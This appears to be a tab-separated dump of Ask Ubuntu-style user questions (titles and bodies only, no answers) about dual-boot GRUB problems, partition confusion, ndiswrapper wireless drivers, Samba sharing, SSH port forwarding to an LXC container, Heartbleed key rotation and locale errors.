446673	dual booting ubuntu on mac , stuck in grub	i realise there are threads out there for this issue already , however i have tried those solutions to no avail . i am a linux newbie trying to dual boot into kubuntu/ubuntu on my macbook air ( intel ) , however when booting into the efi , it simply takes me to the grub , rather than booting the os . i would prefer to use kubuntu , but this issue seems to persist regardless of iso , having tried both kubuntu and ubuntu thus far . i followed this guide , and have successfully formatted a usb to a fat32 partition . here is the contents of my usb - it wo n't let me post images , sorry ! i 've tried using refit and holding the option/alt key down , with the same results . the efi appears and i am able to select it , however it then takes me straight to the grub , which looks something like this : gnu grub version 1.99~rc1 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > when attempting to use the boot command , it says error : no loaded kernel . and so ... i 'm not sure what else to do . i 've tried both the 32-bit and 64-bit versions of the efi ( obviously the 32-bit version did n't work ) , and as previously mentioned , two distributions to no avail . does anyone have any suggestions ? please and thank you !
446675	why ubuntu is mixing my hdd 's saying sda1 is the same as sdb6	so i have this problem which i really do n't know what to do with it , but it 's making me alot of problems.the problem is not only locked to sda1 and sdb6 partitions it can change from boot to boot . first thing that happened to me is that i was on windows , working regularly as i do in photoshop , and installing the game over steam in background ( so game is not cracked i counld n't get a virus if that matters ) . when i finished with photoshop i wanted to boot back to linux when suddenly i got an error on boot like could n't boot device /mount/sdb1 s for continue or m for manual recovery so i hit s to continue boot when in linux i see the partition is missing . so i typed sudo fdisk -l and i see the partition is there , only invisible on ubuntu , i checked than with gparted and i noticed that sdb1 is actually the partition where is my linux installation . what the heck now ? but im missing the other partition sdb2 , not sdb1 like it said on boot . so i went back to windows and i one of the partitions is basically formated it was the sdb6 partition which was missing in linux . so i went back on linux and same error on boot and started in deep look . the hdd and partition configuration before i had a problem was like this sdb maxtor hdd sdb1 extended sdb5 swap sdb6 ext4 linux sdb2 ntfs label second sda hitachi hdd sda1 ntfs label storage sda2 ntfs label system reserved ( this is windows 100mb system reserved partition ) sda3 ntfs ( windows installation partition ) so the sdb2 partition is now missing and not able to mount . i have the same partition configuration now . but take a look at this . gparted is showing that partition is mounted and not able to unmount , while partition is not mounted and visible at all in nautilus . krusader however shows that partition is there , but not able to mount it . so investigating further more fdisk -l says this disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc17e8984 device boot start end blocks id system /dev/sda1 2048 278386687 139192320 7 hpfs/ntfs/exfat /dev/sda2 * 278386688 278591487 102400 7 hpfs/ntfs/exfat /dev/sda3 278591488 488394751 104901632 7 hpfs/ntfs/exfat disk /dev/sdb : 251.0 gb , 251000193024 bytes 255 heads , 63 sectors/track , 30515 cylinders , total 490234752 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc17e89fa device boot start end blocks id system /dev/sdb1 * 2046 204797951 102397953 5 extended /dev/sdb2 204797952 490233855 142717952 7 hpfs/ntfs/exfat /dev/sdb5 2048 20477951 10237952 82 linux swap / solaris /dev/sdb6 20480000 204797951 92158976 83 linux let some similar numbers not confuse you because both hdd 's are 250gb sata ii ( or one is sata i i think that 's not important ) than i opened /etc/fstab to check if it have something changed and compared to the old backup file , but nothing is different there , it 's by defaults . # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=885cb3b6-ec34-4dda-a0d6-d3da291684e3 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=d56da767-41cc-4d13-9739-9ab86fd6d648 none swap sw 0 0 so for the final step i used storage device manager ( it 's basically gui for fstab ) and that 's where i noticed strange thing in naming my hdd 's and partitions , take a look at screenshoots . in 2 of the different partitions and on different hdd 's it 's say they are the same and that they are the same hdd . this should be the first disk and this should be the second disk notice how it says that sda1 is the same partition and hdd as sdb2 , and weirdest thing is that now when i started storage device manager again , sda1 is missing from the list . so anyone have answer to what is happening here ? edit : now after restarting my pc , sda1 says it 's sdb6 , weird right ? is it a disk problem or is it ubuntu problem ?
446676	changes in remote dropbox files via ssh does not actualize local files	i have an officepc ( ubuntu 12.04 lts ) which i access from homepc ( ubuntu 12.04 lts ) through ssh and i change some remote files in a dropbox folder , but the local dropbox folder doesnt mirror the changes . so i check with $ dropbox status dropbox is n't running ! but if i do $ ps aux | grep dropbox leonardo 1939 0.5 2.7 467644 56136 ? ssl mar26 125:05 /home/leonardo/.dropbox-dist/dropbox leonardo 1953 0.0 0.0 5628 836 pts/6 s+ 17:27 0:00 grep -- color=auto dropbox it seems that dropbox is running but it does not take into account the changes i made via ssh .
446680	unable to compile ndiswrapper	i 'm trying to install ndiswrapper to get my wireless netgear to work . i did the following : apt-get install ndiswrapper-source which completes successfully . then : apt-get install ndiswrapper-dkms which returns : setting up dkms ( 2.2.0.3-1ubuntu3.2 ) ... setting up ndiswrapper-dkms ( 1.57-1ubuntu1 ) ... loading new ndiswrapper-1.57 dkms files ... first installation : checking all kernels ... building only for 3.11.0-19-generic building initial module for 3.11.0-19-generic error ! bad return status for module build on kernel : 3.11.0-19-generic ( x86_64 ) consult /var/lib/dkms/ndiswrapper/1.57/build/make.log for more information . when i look at /var/lib/dkms/ndiswrapper/1.57/build/make.log i see : can not find kernel build files in /usr/src/linux-headers-3.11.0-19-generic please give the path to kernel build directory with the kbuild= < path > argument to make upon closed examination the makefile expects to find : $ ( kbuild ) /include/linux/version.h /usr/src/linux-headers-3.11.0-19-generic/include/generated/uapi/linux/version.h /usr/src/linux-headers-3.11.0-19-generic/include/config/evm/hmac/version.h /usr/src/linux-headers-3.11.0-19-generic/include/config/arch/want/compat/ipc/parse/version.h what 's going wrong ? looks like an incompatibility between the ndiswrapper and the kernel . but i 'm using the latest version of both . update : i downloaded the driver compiled fine and i was able to install my driver : ndiswrapper -l bcmwlhigh6 : driver installed device ( 0846:9011 ) present however , i still have no wireless , iwconfig does not show anything . i noticed that : modprobe ndiswrapper returns nothing . then i did : dmesg|grep ndis and voila . seems like even though the driver compiled and installed successfully it 's all broken , possibly due to the kernel mismatch or something ... [ 495.031481 ] ndiswrapper : module verification failed : signature and/or required key missing - tainting kernel [ 495.032287 ] ndiswrapper version 1.59 loaded ( smp=yes , preempt=no ) [ 495.295718 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisqueueioworkitem' [ 495.295725 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreeioworkitem' [ 495.295729 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismsetminiportattributes' [ 495.295734 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismresetcomplete' [ 495.295737 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismallocateport' [ 495.295741 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocateioworkitem' [ 495.295744 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismsendnetbufferlistscomplete' [ 495.295748 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismderegisterminiportdriver' [ 495.295751 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatenetbufferlistpool' [ 495.295756 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismnetpnpevent' [ 495.295761 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismregisterminiportdriver' [ 495.295765 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismfreeport' [ 495.295768 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismindicatereceivenetbufferlists' [ 495.295772 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismpausecomplete' [ 495.295776 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreenetbufferlistpool' [ 495.295779 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndiscanceltimerobject' [ 495.295783 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisopenconfigurationex' [ 495.295786 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndissettimerobject' [ 495.295790 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreetimerobject' [ 495.295794 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatetimerobject' [ 495.295797 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismindicatestatusex' [ 495.295801 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreenetbufferlist' [ 495.295808 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismgetbusdata' [ 495.295812 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisgetsystemuptimeex' [ 495.295815 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatenetbufferandnetbufferlist' [ 495.295819 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatemdl' [ 495.295822 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreemdl' [ 495.295828 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismoidrequestcomplete' [ 495.295832 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatememorywithtagpriority' [ 495.295839 ] ndiswrapper ( import:232 ) : unknown symbol : wdfldr.sys : 'wdfversionbind' [ 495.295841 ] ndiswrapper ( import:232 ) : unknown symbol : wdfldr.sys : 'wdfversionbindclass' [ 495.295844 ] ndiswrapper ( import:232 ) : unknown symbol : wdfldr.sys : 'wdfversionunbindclass' [ 495.295847 ] ndiswrapper ( import:232 ) : unknown symbol : wdfldr.sys : 'wdfversionunbind' [ 495.295849 ] ndiswrapper ( load_sys_files:200 ) : could n't prepare driver 'bcmwlhigh6' [ 495.296262 ] ndiswrapper ( load_wrap_driver:103 ) : could n't load driver bcmwlhigh6 ; check system log for messages from 'loadndisdriver' [ 495.296300 ] usbcore : registered new interface driver ndiswrapper
446682	how to install ubuntu on portable external hard drive ?	os : windows 7 . i want install linux ubuntu on portable external hard drive usb 2.0 . i read a variety of methods , but i 'm confused by contradictory advices and methods . actually , installing ubuntu on anything other than clean pc looks much more complicated than installing windows . i need to have ubuntu package + python 2.7 + c compiler installed . my external hard drive is partially filled , i need to keep all files . will ubuntu run entirely on external hardrive , without writing anythinhg to windows system folders and to registry ? can anyone post detailed guide how install ubuntu on external hard drive ?
446685	how to move unity launcher icons to desktop ?	everyone . ok , i have what may be a very simple question -- how do i take an icon from the unity launcher that i had locked there , and move them onto the desktop ? i have tried everything i can think of and can not get it to work , the icons just slide back the launcher !
446686	administrator block on chromecast extension	using my work 's computer at home , no access restrictions whatsoever . the only thing that i ca n't download is a chromecast extension ... blocked by administrator . any way around it ? have been using it for quite some time , and all of a sudden this block . now my chromecast is useless . can you help please ?
446688	samba : how do i make shared folders invisible from users with no permission ?	i have a ubuntu 13.10 desktop setup with a samba server . users can access their assigned folders from their windows 7 workstation , but they can also see other folders that they do n't have permissions to open the folders . i 've already tried using `` hide unreadable = yes '' as well as modifying `` browseable = no '' , but the folders are still visible . also i always have to restart the whole system in order settings changes in samba to take affect . i 've already to stop , start and restart samba server . is there a way to avoid restarting the whole system ? i 've also tried adding `` hide unreadable = yes '' under global settings . attached is the smb.conf file : http : //s29.postimg.org/tkw1jagxz/pic.png [ fdipice ] path = /home/bu/users/fdipice writeable = yes ; browseable = no hide unreadable = yes valid users = fdipace comment = frank 's home directory [ jkoan ] path = /home/bu/users/jkoan writeable = yes ; browseable = no hide unreadable = yes valid users = jkean comment = [ tim ] path = /home/pu/users/tim writeable = yes ; browseable = no hide unreadable = yes valid users = tim comment = [ it_software ] path = /home/pu/shared/it_software writeable = yes ; browseable = no hide unreadable = yes valid users = john comment = it shared folder
446691	in ubuntu 13.04 , can not install libssl-dev	how can i get around the dependency problem when installing libssl-dev ? the problem : $ sudo apt-get install libssl-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libssl-dev : depends : libssl1.0.0 ( = 1.0.1c-4ubuntu8 ) but 1.0.1c-4ubuntu8.1 is to be installed e : unable to correct problems , you have held broken packages . system info : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring $ uname -a linux compy 3.8.0-30-generic # 44-ubuntu smp thu aug 22 20:52:24 utc 2013 x86_64 x86_64 x86_64 gnu/linux my question looks similar to this one - but no , apt-get update does not do a thing for me .
446696	wireless connection not establishing	my ubuntu os asks for wireless password , attempts to connect , asks for password , attempts to connect ... ... the cycle continues . the problem isnt with the router or connection as i am connecting with another device . this has happend all of a sudden . i am very confused , please help .
446699	video playback running very slow ( mp4 , youtube , etc ) on asus eepc 1201t 2gb using ubuntu 13	i used to have a windows 7 starter edition os installed on a asus eepc 1201t 2gb and mp4 hd videos from my camcorder used to play fine . so i switched to ubuntu 13 , the whole system is pretty faster compared to windows except the video playback . i 've installed flash and ubuntu restricted extras . i believe this could be a codec issue or something . any suggestions ?
446705	trouble updating to crossover 13.1	i am running ubuntu 12.04 . i have crossover 12.5 . according to codeweavers.com i can update to v.13.1.2 . i followed the instructions given on the website but it wo n't install . is there a step i am missing or a way to update to v.13.1.2 by using the terminal ?
446706	ca n't get asus usb-n13 network adapter to work . how do i check for conflicting drivers ?	i am trying to get the internet working on my computer running ubuntu linux . i got the asus usb-n13 network adapter because i heard it is supposed to work out of the box with linux . well mine did n't . i believe it may be because of conflicting drivers installed on the system but i truly have no idea or how to check that . i tried to install windows drivers for another network adapter i had using ndiswrapper but did n't get anything to work so i bought the asus network adapter . it shows that there is a network but does n't connect to it . i tried finding information online how to install the drivers for this network adapter and found some information but i did n't try it yet because i also found that there is a possibility that there are conflicting drivers . i 'm wondering if i might have any because of previously trying to install other drivers . how do i check if i have any conflicting drivers and how do i get rid of them ?
446708	unable to get wireless netgear wnda3100v2 to work	after a long struggle i was able to successfully install the ndiswrapper and the windows driver . the driver is reported now as installed : sudo ndiswrapper -l bcmwlhigh6 : driver installed device ( 0846:9011 ) present the device id matches the one from lsusb output : lsusb|grep net bus 002 device 002 : id 0846:9011 netgear , inc. wnda3100v2 802.11abgn [ broadcom bcm4323 ] but still ca n't connect to wireless . iwconfig eth0 no wireless extensions . lo no wireless extensions . i noticed that : modprobe ndiswrapper returns nothing . then i did : dmesg|grep ndis and voila . what do those messages mean ? both my drivers and my ubuntu are x64 . [ 495.031481 ] ndiswrapper : module verification failed : signature and/or required key missing - tainting kernel [ 495.032287 ] ndiswrapper version 1.59 loaded ( smp=yes , preempt=no ) [ 495.295718 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisqueueioworkitem' [ 495.295725 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreeioworkitem' [ 495.295729 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismsetminiportattributes' [ 495.295734 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismresetcomplete' [ 495.295737 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismallocateport' [ 495.295741 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocateioworkitem' [ 495.295744 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismsendnetbufferlistscomplete' [ 495.295748 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismderegisterminiportdriver' [ 495.295751 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatenetbufferlistpool' [ 495.295756 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismnetpnpevent' [ 495.295761 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismregisterminiportdriver' [ 495.295765 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismfreeport' [ 495.295768 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismindicatereceivenetbufferlists' [ 495.295772 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismpausecomplete' [ 495.295776 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreenetbufferlistpool' [ 495.295779 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndiscanceltimerobject' [ 495.295783 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisopenconfigurationex' [ 495.295786 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndissettimerobject' [ 495.295790 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreetimerobject' [ 495.295794 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatetimerobject' [ 495.295797 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismindicatestatusex' [ 495.295801 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreenetbufferlist' [ 495.295808 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismgetbusdata' [ 495.295812 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisgetsystemuptimeex' [ 495.295815 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatenetbufferandnetbufferlist' [ 495.295819 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatemdl' [ 495.295822 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisfreemdl' [ 495.295828 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndismoidrequestcomplete' [ 495.295832 ] ndiswrapper ( import:232 ) : unknown symbol : ndis.sys : 'ndisallocatememorywithtagpriority' [ 495.295839 ] ndiswrapper ( import:232 ) : unknown symbol : wdfldr.sys : 'wdfversionbind' [ 495.295841 ] ndiswrapper ( import:232 ) : unknown symbol : wdfldr.sys : 'wdfversionbindclass' [ 495.295844 ] ndiswrapper ( import:232 ) : unknown symbol : wdfldr.sys : 'wdfversionunbindclass' [ 495.295847 ] ndiswrapper ( import:232 ) : unknown symbol : wdfldr.sys : 'wdfversionunbind' [ 495.295849 ] ndiswrapper ( load_sys_files:200 ) : could n't prepare driver 'bcmwlhigh6' [ 495.296262 ] ndiswrapper ( load_wrap_driver:103 ) : could n't load driver bcmwlhigh6 ; check system log for messages from 'loadndisdriver' [ 495.296300 ] usbcore : registered new interface driver ndiswrapper
446710	qml : simplest way to write to a text file ?	qml at the moment lacks basic system commands , so i am looking for the most simple template to write to /tmp/text.txt .
446711	what backup solution allows for the easiest migration and restore of machines , even if they 're restored from a vm or bare metal and vice versa ?	i manage a lot of ubuntu machines , many physical , many virtual . backup as a general concept is pretty simple , but backup of entire systems tends to get murky . i 'm familiar with virt-p2v , but that tends to require individual attention to a system when you want to migrate it . the same is true with migrating disk images ( qed , vmdk , lvm volumes , et cetera . ) the closest i 've found has been acronis backup and restore , which runs an agent on each machine ( bare or guest ) and communicates with a central server and handled various conversion aspects like converting disk uuids and mbr-to-gpt conversions as part of the restore process . unfortunately , acronis is proprietary and wildly expensive if you want these features for two home systems and a dozen vms . are there any good solutions i could put in place that take backups in a way that largely ignores the state a restore would be done in ? that is , machines are regularly backed up in an automated fashion so that when need arises , it can be quickly restored to a target machine - even if this target machine is now a vm when it was previously bare ? ( or the other way around ? )
446712	shared drive between windows and ubuntu	i have laptop which has hdd . i can use this hdd both in ubuntu 13.10 and windows7 . i have problem if i save some documents in ubuntu , why i can not see that file in windows . is there any valid reason behind this.but vice versa is possible .
446713	nvidia graphics `` unknown '' but gpu driver installed and enabled ?	i 've just installed 12.04 and then installed the nvidia-331 driver . 331 is installed and enabled according to additional drivers and nvidia x server settings confirms that the driver version in use is 331 . i 've turned off my machine 's integrated gpu via the ueif , and successfully booted into ubuntu desktop . however , in system settings > details > graphics my gpu is listed as `` unknown '' . i 've attempted to use blender , and it seems to be performing unsuspiciously . also , nvidia x server settings tells me that my gpu utilizations fluctuates when using blender ( between 0 and 30 percent ) . so , what 's the deal ? is there a good way to tell if my graphics card is being used ? the card is geforce gtx 760 sc .
446715	prerouting ssh to lxc container ?	i 'm trying to ssh on my container but i 'm getting these errors openssh_6.2p2 , osslshim 0.9.8r 8 dec 2011 debug1 : reading configuration data /etc/ssh_config debug1 : /etc/ssh_config line 20 : applying options for * debug1 : /etc/ssh_config line 102 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to some_random_ip [ some_random_ip ] port 2222. debug1 : connect to address some_random_ip port 2222 : connection refused ssh : connect to host some_random_ip port 2222 : connection refused i 've tried doing some iptables stuffs , i 'm already done forwarding port 80 to port 3001 , but i failed doing it on ssh iptables -t nat -a prerouting -i eth0 -p tcp -- dport 2222 -j dnat -- to 10.0.3.10:22 i also did a check on ufw and allow 22/tcp and 2222/tcp any clues ?
446717	bitorrent file share feature	i used to use bitcomet and it had a feature that would generate a list of available files from whomever you were currently downloading a file from [ if they allowed you to ] . it was called 'file share ' . do any 12.04lts compatable clients do this ?
446724	copy folders ( not one file ) using ssh ubuntu ?	i am trying to copy a folder to remote ubuntu server using command line ssh connection , i understand it 's doable to transfer a file using scp but i have many files in a folder iam trying to copy to that remote server , how is that done ? anyone ? thank you .
446728	dos box screen resolution problem	i am using ubuntu 12.04 lts and i installed dosbox using apt-get install doxboxcommand and configured tc in dosbox properly . everything is working fine , but when we it goes to full screen mode of dosbox then it changes the resolution of the screen and it may happen , that doxbox is closed unexpectedly , because i ca n't see its process on the launcher after going to full screen mode . after trying 2-3 times dosbox is going to full screen mode properly , but on exiting same problem is remaining . i am using alt+enter to switch the full screen mode in dosbox
446729	how to alias one command to be resolved into another command ?	afaik alias is usually used to make 'shortcut ' for long command . but what to do if i want to alias one command to another ? i need this because i replaced gnome-screensaver with xscreensaver , so the lock screen button does not work . how to alias gnome-screensaver-command -l to be resolved into xscreensaver-command -lock ?
446731	after installing emonic as root , eclipse can not recognize it	i wanted to program with emonic in eclipse . when i tried to install it from the site i got an error message so i installed it as a root user ( using su ) . now , after i restarted eclipse but still it does n't recognize any .net environment in fact not emonic 's . how can i solve it ?
446733	can not resize ubuntu disk using wubi-resize ( installed from wubi )	i 'd like to expand my disk space in ubuntu . right now , it has 30 gb space which is the maximum allowable installation size in wubi . i wanted to extend it to 50 gb so i 've done a live resizing according to this website i 've already executed the first command which is : sudo dd if=/dev/zero bs=1mib of=/host/ubuntu/disks/root.disk conv=notrunc oflag=append count=20480 after 10 minutes i 've executed the 2nd command : sudo losetup -c /dev/loop0/ but it outputs an error : loop : ca n't set capacity on device /dev/loop0/ : not a directory is there anything i can do to work this around ?
446734	heartbleed and openvpn , am i safe ?	i run my own openvpn server , since the discovery of heartbleed i updated openssl , changed the server password and ran the command ./clean-all to erase all keys and certificates . and of course , i generate new ones . my doubt/question is : it 's ./clean-all safe enough to avoid unauthorized acess to my vpn ? assuming that any of the access keys had been stolen .
446735	problem in wifi connectivity in ubuntu 12.04	ubuntu 12.04 asks for wireless password , attempts to connect , asks for password , attempts to connect ... ... the cycle continues . the problem is n't with the router or connection as i connecting with another device.and when i restarts again os it works for some times but problem again persists .
446737	how to simply point my localhost ( 127.0.0.1 ) to my /home/user/ dir ?	how do i simply point my localhost to my home directory ? when i type 127.0.0.1 on browser then it will redirect to my home dir .
446744	ca n't connect to a wifi on 13.10	so few days ago i got a new laptop with ubuntu 13.10 installed on it . it works fine when i connect with wired ethernet , it even sees the wi-fi just when i double click it , it tries to connect and then it just stops with an empty wi-fi symbol . i 'm very new to this whole system , so please try to simple the answers ... thank you . i 'm really looking for a fix since having 2 cables at once is pretty annoying : p
446755	what does .gu stand for ?	what does .gu stand for ? for example : conditionallayout { name : `` row '' when : layouts.width > units.gu ( 50 ) //right here row { anchors.fill : parent etc ... .
446763	booting from flash drive	hello i 'm rather new to ubuntu and i was wondering if someone could point me to a tutorial of how to boot from a flash drive and tell me if i need to partition my hard drive in anyway in order to boot from a flash drive . thank you for your time .
446771	unable to share folder in ubuntu . host is windows7	i have installed ubuntu 12.04 in vmware and host is windows7 . i want share folders between windows 7 and ubuntu . i went through the already posted questions and answers but nothing really worked . i have enabled sharing in vmware and still not found the solution .
446772	is it safe to install the boot loader on /dev/sda , and install ubuntu on /dev/sdb ?	i have a 120gb ssd and a 2tb hdd in my computer . the windows 7 os is installed on the ssd . if i install ubuntu 13.10 on the hdd , but select the ssd as the boot loader location , and since ubuntu does n't detect that windows is installed , could it cause problems ? my full procedure was/would be : i created an unallocated partition in windows i uninstalled wubi ( i still had it installed since my previous failed attempt at installing ubuntu ) i put in my ubuntu 13.10 disc , reboot , `` try ubuntu '' and run the installer . during the step where it asks what to do , it tells me that no existing os was detected , which is why i chose to abort the installation . ( my windows 7 partition is working properly ) i would chose `` something else '' , and split the free space into two partitions : a swap area and an ext4 journaling system partition with the mount point / . i would set the `` device for boot loader installation '' to /dev/sda ( the ssd ) . i would install ubuntu onto the ext4 partition and hope for the best i had a problem with my previous ubuntu installation , which got me stuck on a grub rescue screen every time i turned on my computer , which is why i decided to think twice . should i proceed with the installation ? can anyone speak from personal experience ?
446774	install package from without adding ppa	is there a way to install a package via a simple url without having to add a ppa beforehand ? something like apt-get https : //url.to.package.deb ? or perhaps some command line options that would add the ppa , update , and install the package all at once ? seems like i 've seen other package managers that do this . i just find it a hassle to type the commands to add a whole repository just so i can install only one of it 's packages .
446778	left alt key should work as right alt key ( alt gr )	i 'm using a german apple keyboard on my ubuntu 12.04 machine . under mac os x the left alt key has the same behavior as the right alt key ( i think the right alt key acts a alt gr ) . i do n't know what i must remove from the mapping to clear the left alt key and what i must add that the left alt key acts the same way as the right alt key ? my questions are how can i get the current mapping of the right alt key and assign it to the left alt key ?
446780	upload file to openstack cinder using php-opencloud	i have installed openstack using devstack and it has swift disabled i want to know how do i store files to cloud using openstack cinder ?
446789	how to remove windows 7 now i 've installed ubuntu ?	look to this link for image : i want to remove windows 7 because now i have ubuntu , what should i do now ? which partition is which ? thank you so much , this is the last step of sorting this out after hdd replacements and a crazy load of file transfers ! sudo fdisk -l :
446793	unsupported locale setting	whenever i log in to my ubuntu 12.10 server via ssh , i see : https : //bugs.launchpad.net/command-not-found/+filebug please include the following information with the report : command-not-found version : 0.3 python version : 3.2.3 final 0 distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal exception information : unsupported locale setting traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/commandnotfound/util.py '' , line 24 , in crash_guard callback ( ) file `` /usr/lib/command-not-found '' , line 69 , in main enable_i18n ( ) file `` /usr/lib/command-not-found '' , line 40 , in enable_i18n locale.setlocale ( locale.lc_all , '' ) file `` /usr/lib/python3.2/locale.py '' , line 541 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting sorry , command-not-found has crashed ! please file a bug report at : https : //bugs.launchpad.net/command-not-found/+filebug please include the following information with the report : command-not-found version : 0.3 python version : 3.2.3 final 0 distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal exception information : unsupported locale setting traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/commandnotfound/util.py '' , line 24 , in crash_guard callback ( ) file `` /usr/lib/command-not-found '' , line 69 , in main enable_i18n ( ) file `` /usr/lib/command-not-found '' , line 40 , in enable_i18n locale.setlocale ( locale.lc_all , '' ) file `` /usr/lib/python3.2/locale.py '' , line 541 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting i 've tried - exporting the right locale adding the export command to /etc/environment dpkg-reconfigure locale running locale and checking the en_gb and en_gb.utf-8 locales are installed ( which it is ) regenerating the locales with locale-gen en_gb.utf-8 and various combinations of the above . anyone know anything else i can try ? [ edit ] more info as requested by gunnar hjalmarsson output of the locale command : locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_gb.utf-8 language=en_gb : en lc_ctype=utf-8 lc_numeric= '' en_gb.utf-8 '' lc_time= '' en_gb.utf-8 '' lc_collate= '' en_gb.utf-8 '' lc_monetary= '' en_gb.utf-8 '' lc_messages= '' en_gb.utf-8 '' lc_paper= '' en_gb.utf-8 '' lc_name= '' en_gb.utf-8 '' lc_address= '' en_gb.utf-8 '' lc_telephone= '' en_gb.utf-8 '' lc_measurement= '' en_gb.utf-8 '' lc_identification= '' en_gb.utf-8 '' lc_all= contents of /etc/default/locale lang= '' en_gb.utf-8 '' language= '' en_gb : en '' lc_all= '' en_gb.utf-8 ''
446794	alternative to autokey ( text expander program )	for more than a year i have been looking for simple and stable text expander application on ubuntu . there is autokey , but it does n't work for many people ( there are a few threads here about this ) . for me ( ubuntu 13.10 ) it crashes all the time and skippes some characters , ... is there any alternative ( all i need is to automatically replace abbreviation that i type ) ? i know there are extensions to browsers but that is n't solution . it would be great it this would be preinstalled feature of ubuntu : - ) thank you in advance for any ideas and suggestions ! best regards jan
